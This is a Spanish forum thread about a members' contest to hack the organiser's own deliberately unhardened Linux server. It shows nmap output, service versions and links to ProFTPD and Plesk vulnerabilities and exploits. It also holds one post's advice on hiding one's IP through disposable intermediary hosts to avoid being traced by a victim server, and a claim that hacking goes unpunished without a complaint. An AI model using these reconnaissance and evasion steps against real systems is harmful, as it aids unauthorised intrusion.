Imprimir Página - Concurso Nº1: "Hack My Server"

Seguridad Informática => Hacking => Mensaje iniciado por: dimitrix en 25 Abril 2012, 00:40 am

Título: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 25 Abril 2012, 00:40 am

Hack My Server

El próximo día 01/05/2012 empezará un concurso que se tratará de Crackear un servidor (Totalmente legal todo). El concurso durará 30 días y si obtenemos permiso de el-brujo seguramente estará patrocinado por alguna empresa y habrá algún premio :-)

Bases:

~~Daremos la IP del servidor que hay que Crackear.~~
El servidor no tiene seguridad.
L~~a IP del servidor se dará por privado.~~

Se trata de ser colaborativos, es decir, si pedis la IP para atacar, contar en este POST como vais a atacar y lo que habeis conseguido.
La idea es que entre todos aprendamos.
Si alguien pide la IP, va atacando y no va informando en este POST, la próxima vez no se le entregará la IP del servidor.

GANADOR

Será el primero que consiga acceder como Root.
Tendrá que haber participado en este foro comentando, etc...
Se le enviará una botella (España) de cerveza.
- La cerveza será una HACKER PSCHORR (http://kd59.files.wordpress.com/2010/03/hackerpschorrweisse.jpg) importada desde alemania.

¡Que gane el mejor!

-------------------------------------------

PUNTACIÓN

Belial & Grimoire - GANADOR
- Muestra con que 2 exploits intentó atacar y con que programa: 1 punto
- Indique que file de Plesk es 'posiblemente' vulnerable. : 1 punto
- Muestra bug y link para posible XSS/SQLi en Plesk: 1 punto
- Muestra escaneo positivo e indica el programa: 1 punto

maxim_o
- Saca servicios del servidor: 2 puntos
- Descubre posible vulneración (no es al final): 1 punto

opportunity
- Posible SQLi en el Plesk: 1 punto
- Muestra IP del server: -1000 puntos
- Comparte posible SQLi: 1 punto

adastra
- Muestra el source para atacar si fuera vulnerable el proFTP: 1 punto
- Aporta como ha intentado acceder al PLESK y resuelve dudas: 1 punto
- Adastra prueba exploit y comparte resultado: 1 punto

m0rf
- Encuentra una vulnerabilidad (pero tiene que tiene que ser en local): 1 punto
- Comparte exploit posible vulnerabilidad: 1 punto

ESTE CONCURSO HA TERMINADO

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: xiruko en 25 Abril 2012, 00:53 am

buenisima idea, se agradecen cosas asi en el foro!

ademas para la gente como yo que no tiene ni idea de acceder a un servidor esto seguro que le vendra muy bien para practicar un poco.

aunque una pregunta... se podria incluir en las bases que el ganador (o los ganadores) explicasen como lo han logrado? una vez acabado el concurso claro.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: m0rf en 25 Abril 2012, 00:55 am

Supongo que no lo diras pero, sera linux o windows el server? :silbar:

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Fastolfe en 25 Abril 2012, 01:01 am

Por si no ha quedado claro en el otro tema: me apunto!
Y me alegro de que haya salido adelante ;)

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 25 Abril 2012, 01:36 am

Citar

aunque una pregunta... se podria incluir en las bases que el ganador (o los ganadores) explicasen como lo han logrado? una vez acabado el concurso claro.

- Se me olvidó comentarlo, solo podrá nombrarse 'ganador' el que explique como lo ha realizado, puesto que esto es para aprender.

Citar

Supongo que no lo diras pero, sera linux o windows el server?

No me importa mucho decirlo pues es fácil saberlo: Linux.
De todos modos pondré la versión del SO y los puertos serán de serie.

Realmente no es más que un servidor reción instalado con un servidor apache, php, etc... pero nada securizado :-)

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Breixo en 25 Abril 2012, 01:50 am

Que buena idea, así aprendemos un poco todos.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: m0rf en 25 Abril 2012, 02:14 am

Cita de: dimitrix en 25 Abril 2012, 01:36 am

- Se me olvidó comentarlo, solo podrá nombrarse 'ganador' el que explique como lo ha realizado, puesto que esto es para aprender.
No me importa mucho decirlo pues es fácil saberlo: Linux.
De todos modos pondré la versión del SO y los puertos serán de serie.

Realmente no es más que un servidor reción instalado con un servidor apache, php, etc... pero nada securizado :-)

Ok.

Aguantara no? xDD

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: isseu en 25 Abril 2012, 02:19 am

donde me apunto :)

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 25 Abril 2012, 02:26 am

Citar

Aguantara no? xDD

- Los ataques espero que no xDDD
- Fisicamente es un servidor contratado, no está en mi casa...

Si lo dejo 'fácil' es para ir aprendiendo todos poco a poco y luego ir subiendo la seguridad, etc...

Cita de: isseu en 25 Abril 2012, 02:19 am

donde me apunto :)

El 1/5/2012 lo diré.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: cronos426 en 25 Abril 2012, 03:29 am

Uy pero que bueno estara esto ;-)

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: $Edu$ en 25 Abril 2012, 15:38 pm

Corriendo un live cd de Back Track 5 ya sirve? sin instalarlo me refiero.

Se espera el Teorico para ir estudiando dias antes xD

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 25 Abril 2012, 17:37 pm

Cita de: $Edu$ en 25 Abril 2012, 15:38 pm

Corriendo un live cd de Back Track 5 ya sirve? sin instalarlo me refiero.

Se espera el Teorico para ir estudiando dias antes xD

Cada uno puede atacar como quiera :-)

PD: Yo también usaré el BT5

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 25 Abril 2012, 23:21 pm

Cita de: puntoinfinito en 25 Abril 2012, 17:56 pm

Edu tienes razón, el teórico...

No entiendo lo del teórico ¿Podeis explicarlo?

Esto es una especie de concurso, no es un Tuto, una vez alguien consiga acceder, ya se realizará el tuto.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: jpmo4 en 26 Abril 2012, 00:04 am

Vale todo? jeje. Salu2

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 26 Abril 2012, 01:10 am

Cita de: jpmo4 en 26 Abril 2012, 00:04 am

Vale todo? jeje. Salu2

Sí, excepto ataques por fuerza bruta y D/DOS.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: H1tchclock en 26 Abril 2012, 01:35 am

Estoy emocionado, al menos intentar poner en practica, lo "minimum" que aprendi aqui... Solo el intento ya me dejara feliz.... Gracias, elhacker.net ;D

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: sopitas en 26 Abril 2012, 09:28 am

Cita de: dimitrix en 25 Abril 2012, 00:40 am

Hack My Server

Daremos la IP del servidor que hay que Crackear.
El servidor no tiene seguridad.
La IP del servidor se dará por privado.
Existirán 3 podios. Dependiendo el nivel de intrusión.

También me gustaría dejar claro que la idea de realizar esto es para que todos los usuarios aprendamos de todos, por lo que los organizadores agradeceriamos que se realizaran comentarios para que así todo el foro poco a poco fuera consiguiendo acceder al servidor.

Esta idea ha salido de aquí (http://foro.elhacker.net/foro_libre/propuesta_curso_ethical_hacking-t358544.0.html).

¡Comentarme que os parece!

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: $Edu$ en 26 Abril 2012, 16:02 pm

Dimitrix, lo que pasa que como dejabas claro que esta idea salio del post del curso de ethical hacking.. pensaba que era relacionado, es decir, lo que aprendemos ahi aplicarlo en tu servidor. Pero bien, esto es cosa a parte, aca intentaran los que ya sepan del tema, yo me quedare viendo como van entonces xD Saludos!

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 26 Abril 2012, 16:25 pm

Cita de: $Edu$ en 26 Abril 2012, 16:02 pm

Bueno, esa parte vendrá después, la idea es que 'entre todos' pongamos poco a poco ideas y consigamos crackear el servidor. Y luego veremos paso a paso como se hace.

Luego prepararemos ataques de SQL Injection, XSS, etc...

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: $Edu$ en 26 Abril 2012, 16:41 pm

No si, esta bien, no hay problema, yo mirare como lo hacen aca y aprendere lo que no he podido aprender aun, que es el pase de una vez infectada la web pasarse al control de la pc, si es que es eso por lo menos lo que haran, eso espero xD

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: ELVJop en 26 Abril 2012, 18:41 pm

Cita de: dimitrix en 26 Abril 2012, 01:10 am

Sí, excepto ataques por fuerza bruta y D/DOS.

****** mis preferidos. Que sepan que participare...

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: raptorfx7 en 27 Abril 2012, 00:59 am

Y porque no se podrian ataques de fuerza bruta para encontrar las claves?....lo de DOS està mal pero fuerza bruta no le veo el porque

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 27 Abril 2012, 02:40 am

Cita de: raptorfx7 en 27 Abril 2012, 00:59 am

Y porque no se podrian ataques de fuerza bruta para encontrar las claves?....lo de DOS està mal pero fuerza bruta no le veo el porque

No es uan buena forma. No se trata de probar un diccionario de 1000 claves, sino que se puede tirar haciendo varios millones de combinaciones para no encontrar nada.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: The_Mushrr00m en 27 Abril 2012, 06:56 am

Buena La Iniciativa Espero Poder Aprender'

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: ELVJop en 27 Abril 2012, 19:45 pm

El servidor sera 100% nuevo? Es porque tengo un metodo que ya use una vez y depende de lo nuevo que sea.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: opportunity en 27 Abril 2012, 20:26 pm

yo tmb me apunto

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: maxim_o en 27 Abril 2012, 20:28 pm

A ver... Esto no tiene que ser vamos a reventar el servidor o colapsarlo... por eso fuerza bruta y Dos creo que es jorobar a todo el mundo....

El tema es sencillo, supongo que pondrá un servidor basado en linux con sus diferentes servicios corriendo etc sin parchear....

Los que participen prueban , miran, buscan vulnerabilidades, las explotan , y se le manda cuando se haya accedido al servidor... Se va poniendo las diferentes formas de las que se ha accedido detalladamente para que los que no lo logren/logremos aprendamos....
Y supongo que conforme se vaya superando, ira poniendo mas tramas parches etc

Vamos, creo que esa era la idea... Y mientras se van haciendo las cosas se vaya poniendo en el foro para que entre todos se logre entrar.... Un servidor para aprender y que aprendamos todos de todos.... No en plan entro soy el mejor ale .....

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: h1t en 27 Abril 2012, 20:30 pm

Me parece una buena iniciativa, yo me apunto :)

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 28 Abril 2012, 02:23 am

Cita de: ELVJop en 27 Abril 2012, 19:45 pm

El servidor sera 100% nuevo? Es porque tengo un metodo que ya use una vez y depende de lo nuevo que sea.

No lo entiendo muy bien, el SO lo instalé hace 1 semana.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 28 Abril 2012, 02:24 am

Cita de: maxim_o en 27 Abril 2012, 20:28 pm

Es justamente eso :-)

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Belial & Grimoire en 28 Abril 2012, 04:33 am

a mi me parece genial, ya me estoy oxidando un poco por la falta de tiempo para eso, seria bueno reafirmar y aprender mas

me gusta la idea, por favor haganla si necesitan ayuda espero pueda ayudar para lograrlo, me pone de buen humor cosas donde se pueda aprender y compartir como antiguamente se hacia

;-)

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: h3ct0r en 28 Abril 2012, 05:36 am

Me apunto!! >:D >:D

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: $Edu$ en 28 Abril 2012, 16:51 pm

El primero que ingrese podria crear un archivo de texto, donde todos los que ingresen luego agregarian su nombre ahi xD

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: ELVJop en 28 Abril 2012, 18:26 pm

Buena idea exepto porque el que ingrese despues si es >:D malvado modificaria el archivo y pondria el suyo promero

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 28 Abril 2012, 18:40 pm

Cita de: ELVJop en 28 Abril 2012, 18:26 pm

Buena idea exepto porque el que ingrese despues si es >:D malvado modificaria el archivo y pondria el suyo promero

Se trata de confiar entre nosotros y no ser cabrones.

PD: Para los españoles, como la ley en españa es muy dura, si necesitais alguna acreditación y/o confirmación para que ataqueis los servidores es todo legal, os la puedo ofrecer sin problemas.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: kub0x en 28 Abril 2012, 20:44 pm

Es una idea que siempre tuve en mente y por fin sale aquí, gracias dimitrix. Espero que no haya problema con la legalidad del asunto, todos estamos aquí para aprender más.

Saludos.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: ELVJop en 28 Abril 2012, 22:24 pm

Si no me equivoco la lei española dice que si no lo denuncias no pasa nada tu no digas nada y ya esta

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 29 Abril 2012, 10:33 am

Cita de: ELVJop en 28 Abril 2012, 22:24 pm

Si no me equivoco la lei española dice que si no lo denuncias no pasa nada tu no digas nada y ya esta

No es cierto del todo. Según tengo entendido el intentar acceder a un servidor aunque no lo consigas es delito. Aunque está claro que si no hay denuncia no pasa nada.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: ELVJop en 29 Abril 2012, 11:42 am

Citar

No es cierto del todo. Según tengo entendido el intentar acceder a un servidor aunque no lo consigas es delito. Aunque está claro que si no hay denuncia no pasa nada.

1- WTF? No lo entiendo entonces siempre que voy a un servidor es delito? Espero que haya sido un error porque si no...

2- Lo que yo decia

3- Como se llama el servidor? (Si lo puedes decir ahora si no dilo con la IP)

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: $Edu$ en 29 Abril 2012, 18:32 pm

Se refiere a intentar acceder atacandolo.. y si, es lo que decias vs ELVJop tambien. Lo que quiere decir es que no importa si por ejemplo accedes a facebook o no, iras preso si te denuncian solo por el hecho de intentarlo.

El servidor se llama Pirulo... mira lo que preguntas xD ya dijo que la ip la dara por MP luego, empezando el 1 de Mayo.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: ELVJop en 29 Abril 2012, 19:04 pm

El nombre es muy importante si no mi metodo no funcionara. Ahora mismo te pongo tu reto si lo encuentro... (Ya sabes de que hilo hablo)

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 29 Abril 2012, 23:43 pm

Cita de: ELVJop en 29 Abril 2012, 19:04 pm

El nombre es muy importante si no mi metodo no funcionara. Ahora mismo te pongo tu reto si lo encuentro... (Ya sabes de que hilo hablo)

Es que un servidor puede tener varios nombres asociados (de dominio), aunque la ip que lo resuelve solo tenga uno.

De todos modos, yo solo entregaré la IP, tu tendrás que resolver el nombre, con un ping o como quieras.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: m0rf en 30 Abril 2012, 15:37 pm

Estará listo hoy a las 00:00 ?

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 30 Abril 2012, 16:32 pm

Cita de: m0rf en 30 Abril 2012, 15:37 pm

Estará listo hoy a las 00:00 ?

Pues eso me gustaría, pero todavía no se, se intentará :-)

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: HdM en 1 Mayo 2012, 01:44 am

@Dimitriiiiiiiiiiiixxxxxx, ¿habemus new serverrrrrr or not?

Tienes a la gente deseando irrrrrrrr...

...¡¡¡¡AL ATAKEEEEEEEEERRRRLLLL!!!!(http://www.gif-animados.net/gifs/famososcomicos-7.gif)

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: h3ct0r en 1 Mayo 2012, 06:30 am

Ya tenemos server para trastear??? Seguimos esperando!!! >:D :silbar:

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 1 Mayo 2012, 11:38 am

Sí, ya tenemos server, teneis que mandarme un MP y os envío la IP.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: ELVJop en 1 Mayo 2012, 11:50 am

Ahora se desconecta! Mala pata la mia.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 1 Mayo 2012, 13:09 pm

ELVJop ya te lo he enviado, al igual que a todos que me lo han pedido pro privado.

Algo muy importante, he cambiado las normas y ya he puesto el premio, así que miraros el primer mensaje de este POST.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: ELVJop en 1 Mayo 2012, 13:54 pm

Pues yo intente un programilla que se soluciono con un parche para linux que no se como te entra dentro y te dega trastear >:D la mala noticia es que no se porque no se si es tu server o que pero se me esta resistiendo. :-[

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: maxim_o en 1 Mayo 2012, 18:52 pm

Bueno voy poniendo algo , mas que nada para que la gente que tiene más idea se vaya animando a postear.... ^^

Citar

nmap -O -v xxxxxxxxxxxxxxx
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
53/tcp filtered domain
80/tcp open http
106/tcp open pop3pw
110/tcp open pop3
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
143/tcp open imap
443/tcp open https
445/tcp filtered microsoft-ds
465/tcp open smtps
993/tcp open imaps
995/tcp open pop3s
1720/tcp filtered H.323/Q.931
3306/tcp filtered mysql
8443/tcp open https-alt
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.9 - 2.6.26

220 ProFTPD 1.3.3c Server (ProFTPD) 21
SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu7 22
ESMTP Postfix (Ubuntu) 25
Apache Server 80

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Stakewinner00 en 1 Mayo 2012, 19:10 pm

llegue tarde pero vere si puedo lograr algo

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: ELVJop en 1 Mayo 2012, 19:16 pm

Adios es 2.6.x? Ya me voy despidiendo...

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: $Edu$ en 1 Mayo 2012, 19:17 pm

Jajaja buen premio xD Espero la ip por privado Dimitrix, que quiero ir viendo por lo menos, saludos

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Stakewinner00 en 1 Mayo 2012, 19:19 pm

si alguien me puede enviar la ip del server.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: maxim_o en 1 Mayo 2012, 19:25 pm

La ip, escribirle a dimitrixx y cuando se conecte os dará ip ....
No llegais tarde... ha empezado hoy y dura todo el mes... asi que no os agobieis.....

Mmmmm parece que la version de proftpd es vulnerable.....
http://www.securityfocus.com/bid/44933

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Stakewinner00 en 1 Mayo 2012, 19:34 pm

Creo k el ganador del concuros explicara como lo hizo para ganar, y de paso los que perdieron aprenderian.

Como por ejemplo yo

Yo inteentare atacar al server seguramente no logro nada jaja.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 1 Mayo 2012, 19:54 pm

Ya he respondido todas los mensajes privados, si le falta a alguien que me mande un mensaje privado y se la envío.

Por ahora
- ProFTPD 1.3.3c Server (ProFTPD) 21

Citar

ProFTPd es un servidor FTP. Se promociona desde su página web como estable y seguro, cuando se configura correctamente. El servidor ProFTPd se promociona a sí mismo como un "Software servidor FTP altamente configurable con licencia GPL"

- Al parecer es vulnerable puesto que lo instala el Plesk, así que ya sabemos que tiene el PLESK.

Como explotarlo, más info: http://wiki.woop.es/ProFTPD_TELNET_IAC

Al parecer si conseguimos explotar esta vulnerabilidad podremos tirar el servidor.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: maxim_o en 1 Mayo 2012, 20:06 pm

Pero esa version no es vulnerable no?
Segun he leido eso se corrige en la 1.3.3c
2010-10-29 TJ Saunders∞, desarrollador de ProFTPD, abre la incidencia en el Bugzilla (Bug #3521 - Telnet IAC processing stack overflow∞) y horas después se libera la versión 1.3.3c∞ que soluciona el problema.

Versiones de ProFTPD vulnerables

Todas las versiones de ProFTPD comprendidas entre 1.3.2rc3 y 1.3.3b son vulnerables, el listado completo es:

1.3.2rc3
1.3.2rc4
1.3.2
1.3.3rc1
1.3.3rc2
1.3.3rc3
1.3.3rc4
1.3.3
1.3.3a
1.3.3b

Por lo que en este caso no podría ser explotada no?

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: adastra en 1 Mayo 2012, 20:08 pm

A ver que tal... dado que es todo el mes, hay tiempo para jugar un poco.
Me apunto.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 1 Mayo 2012, 20:22 pm

Vale, saco más datos con sus versiones

21/tcp open ftp ProFTPD 1.3.3c
22/tcp open ssh OpenSSH 5.3p1 Debian 3ubuntu7 (protocol 2.0)
25/tcp open smtp Postfix smtpd
80/tcp open http Apache httpd
106/tcp open pop3pw poppassd
110/tcp open pop3 Courier pop3d
143/tcp open imap Courier Imapd (released 2004)
443/tcp open ssl/http Apache httpd
465/tcp open ssl/smtp Postfix smtpd
993/tcp open ssl/imap Courier Imapd (released 2004)
995/tcp open ssl/pop3 Courier pop3d
8443/tcp open ssl/http sw-cp-server httpd (Parallels Plesk WebAdmin version psa-10.2.0-1011110331.11)

Mmm... nos encontramos que mediante http y el puerto 8443 tenemos acceso al Plesk. http://*******:8443

Y lo mejor, tenemos la versión: 10.2.0

Cita de: adastra en 1 Mayo 2012, 20:08 pm

A ver que tal... dado que es todo el mes, hay tiempo para jugar un poco.
Me apunto.

Me alegra escuchar esto.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Meta en 1 Mayo 2012, 21:25 pm

Buenas:

Curioso concurso, no tengo idea de hacking, aún así quiero aprender a protegerme ya que he instalado Apache con Windows y linux.

Hice un manual sobre Apache con Windows, más adelante lo haré con Linux. Este concurso está bien para ampliar conocimiento en seguridad para protegernos, de paso haré un manual más actualizado tanto en Windows como Linux.

Ver manual (http://electronica-pic.blogspot.com.es/2009/06/servidor-casero-apache-php-mysql.html)

Saludo.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: fcastro93 en 1 Mayo 2012, 21:29 pm

Hola a todos :D
Yo tambien me uno al concurso!! jaja
Por ahora les daré un pequeño truco que tal vez algunos sepan ya pero es para que todos aprendamos n.n
En este caso (y casi que solo en este caso jaja) el servidor nos va a dejar atacar, el problema esta en que si lo hacemos desde nuestra casa hacia un servidor cualquiera, aunq tengamos algun proxy para ocultar ip, cabe la posibilidad de que rasteen nuestra ip.
Pues aqui les traigo como evitar eso.

El problema esencial está en que cuando conectamos a un servidor lo que realmente hacemos la mayoria de veces es darle los parámetros (como la IP nuestra) para que sea él el que se conecte a nosotros, creando un log (registro por asi decirlo) de quienes somos.
Imaginesen que pasaria si no nos conectaramos nosotros sino otra maquina siguiendo nuestras instrucciones y luego de esto cambiamos la ip de esa maquina por otra, haciendo que si el servidor victima trata de localizarnos no encuentre la maquina intermediaria.
Esto es posible con servicios como no-ip (debido a que ya me extendi un poco solo les puedo dar el nombre de este ejemplo) donde nos dan un server que se puede usar una vez y luego "renombrar" la ip o simplemente eliminarlo.
Esto es lo que llaman un método para ocultar IP y el que más me gusta :D
Ojalá les sirva!!

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 1 Mayo 2012, 21:33 pm

Cita de: puntoinfinito en 1 Mayo 2012, 21:31 pm

Voy bien, voy bien...

Recuerda que tienes que compartir. Para esto está creado este 'concurso' y estamos pagando el servidor, para que todos aprendamos.

Suerte :-)

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Meta en 1 Mayo 2012, 21:42 pm

La idea es no saber que SO usan para hackear, así averiguan cual es de paso.

Lo mejor es que no sepan que servidor Web usan, se puede desactivar el Apache y casi, cualquier otro, así se dificulta más. Recuerdo hace tiempo desafié a la gente, ni uno me han hackeado porque no tenían conocieminto necesario y sin cortafuegos.

Saludo.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Breixo en 1 Mayo 2012, 22:13 pm

Bueno pues yo me voy a poner haber si consigo algo >:D

Una duda que tengo, existe alguna aplicación web corriendo en el servidor a mayores del panel de control, como por ejemplo alguna web asociada con algún dominio? Creo que hay una manera de saberlo pero no tengo ni idea de como se hace :S

Edit: Haciendo un whois inverso me he topado con este dominio [borrado] :D pero parece que la aplicación web es la misma que sin ingresar el dominio.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: maxim_o en 1 Mayo 2012, 22:23 pm

No pongais ips , ni nombres de host, etc por que sino es tonteria que de la ip por privado....

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Meta en 1 Mayo 2012, 22:41 pm

Hola:

Lo primero que se hace es obtener cualquier información del servidor, tipo de Linux, versión exacta. Si lo saben, buscar en google vulneración y fallos de ese SO para localizar error. También con los demás programas, sea servidor FTP, Apache, etc.

si alguien descubre un fallo. ¿Se peude poner un archivo de texto en el escritorio que diga hola.txt, si es una Web, que ponga hola hola amigos?

Saludo.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 2 Mayo 2012, 01:29 am

Citar

¿Se peude poner un archivo de texto en el escritorio que diga hola.txt, si es una Web, que ponga hola hola amigos?

Claro.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: pwnz en 2 Mayo 2012, 01:32 am

Aún se puede apuntar gente? me gustaría intentarlo si tengo un rato libre ;D Saludos.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Xenomorfo77 en 2 Mayo 2012, 02:30 am

Yo tambien me apunto, todo sea por aprender. Un saludo a todos.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: m0rf en 2 Mayo 2012, 02:57 am

Ayer hice el escaneo, y prove el exploit del proftp. El exploit no me funcionó, hoy probaré otra vez ya que tenia algunos problemas con el firewall.

De pasada vi también que hay un sql inject y xss en el plesk. A parte el openssh tiene este concepto para un exploit (que en teoria funciona), se trata de compilar jpake en tu cliente con los archivos que hay en este enlace: https://github.com/seb-m/jpake/tree/master/openssl-jpake/ (https://github.com/seb-m/jpake/tree/master/openssl-jpake/)
Este exploit solo funcionara por lo que tengo entendido si el servidor tiene compilada la parte de jpake, sino no funcionara.

No he buscado más para el openssh, lo único que encontre fueron un par de DOS diría, pero ahí lo deje.

Pues nada acabo de poner a punto el sistema y os cuento más en unas horas/minutos. Me parece que voy a continuar con el clásico nc.exe xDD

Saludos.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Once en 2 Mayo 2012, 07:14 am

Probé el exploit para el ProFTP pero parece que el server no es de los que está backdorizado(http://www.1337day.com/exploits/15026)
También le heché un vistazo a los métodos del HTTP (nada interesante)

Mañana si tengo algo de tiempo busco ese SQLi

Saludos!

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: maxim_o en 2 Mayo 2012, 11:59 am

El proftpd no está backdorizado.... en teoria esa version fue backdorizada hace mucho tiempo por que entraron en el servidor de proftp y cambiaron el archivo original por la version backdorizada y estuvo asi unos dias en descarga ... pero ahora mismo ya no es así.

En teoria tiene una vulnerabilidad http://www.securityfocus.com/bid/44933/info la cual si se explota te da permisos de root, y si no funciona igual le haces un dos a la maquina....
En esta pagina sale la informacion y programación etc del exploit: http://phrack.org/issues.html?issue=67&id=7#article

Ahora el plesk panel 10.2.0 es vulnerable a ataques de sql inyection y xss y tambien una vulnerabilidad remota pero no veo informacion de como poder explotarla.
http://www.securityfocus.com/bid/52267
http://www.securityfocus.com/bid/49887

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 2 Mayo 2012, 12:06 pm

maxim_o Ayer me encontré con lo del Plesk, pero creo que para el SQLi necesita tener un Addon que no viene de serio 'creo'.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: opportunity en 2 Mayo 2012, 12:21 pm

Aunque todavia no tengo la IP del server me he puesto con ello viendo la info que estais dejando.

Viendo que tiene Plesk y la version he visto varias vulnerabiliades:
http://kb.parallels.com/es/113324
http://www.exploit-db.com/exploits/15313/

Hace unos meses hubo algo muy gordo relacionado con Plesk quizás va por ahí el tema.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: opportunity en 2 Mayo 2012, 12:22 pm

ya tengo la ip!!!! thanks a lot.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: thein0de en 2 Mayo 2012, 13:35 pm

Me apunto a echar un vistazo... Si sois tan amables de enviarme la IP...

Un saludo!

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Puntoinfinito en 2 Mayo 2012, 14:32 pm

Dimitrix, pon la IP, sino algunos tendrán que esperar a que le envies.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: maxim_o en 2 Mayo 2012, 14:41 pm

Creo que de eso se trata que le escriban un privado.... hay un mes entero... tampoco hay prisa asi cualquiera que ojee el tema no podra ponerse a atacar y solo "jueguen" los que participan en el

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Puntoinfinito en 2 Mayo 2012, 14:45 pm

Ah, hostia ya no me acordaba del mes xD
Entonces, ¡Paciencia!

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 2 Mayo 2012, 15:03 pm

Exacto, la idea es que participemos todos, ya que estoy pagando todo esto, lo único que espero es que la gente 'colabore'.

No ataque para probar y no publique lo que encuentra. Si quieren hacer eso me parece muy bien, pero no con mi server. Aquí quien quiere atacar que colabore. Esto es una comunidad :-)

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Breixo en 2 Mayo 2012, 15:17 pm

Yo creo que el punto más débil como habéis comentado es el panel de parallels, esta vulnerabilidad http://kb.parallels.com/en/113313. Con lo que en teoría se podría entrar por ahí.

Pero el problema es que en ningún sitio encuentro realmente en que consiste realmente el fallo, lo único que hay es esto http://www.exploit-db.com/exploits/15313/, pero se trata de un parallels plesk sobre Windows. He tratado de reproducir las peticiones que hace el fulano pero no hay manera de obtener ni siquiera un simple error.

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Puntoinfinito en 2 Mayo 2012, 15:24 pm

Yo estoy preparando todo tipo de cosas para probarlas en cuanto dimitrix me pase su IP xD
¿Me la pasas por favor? Así comenzaré a probar :P

Saludos

Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 2 Mayo 2012, 15:26 pm

Cita de: Breixo en 2 Mayo 2012, 15:17 pm

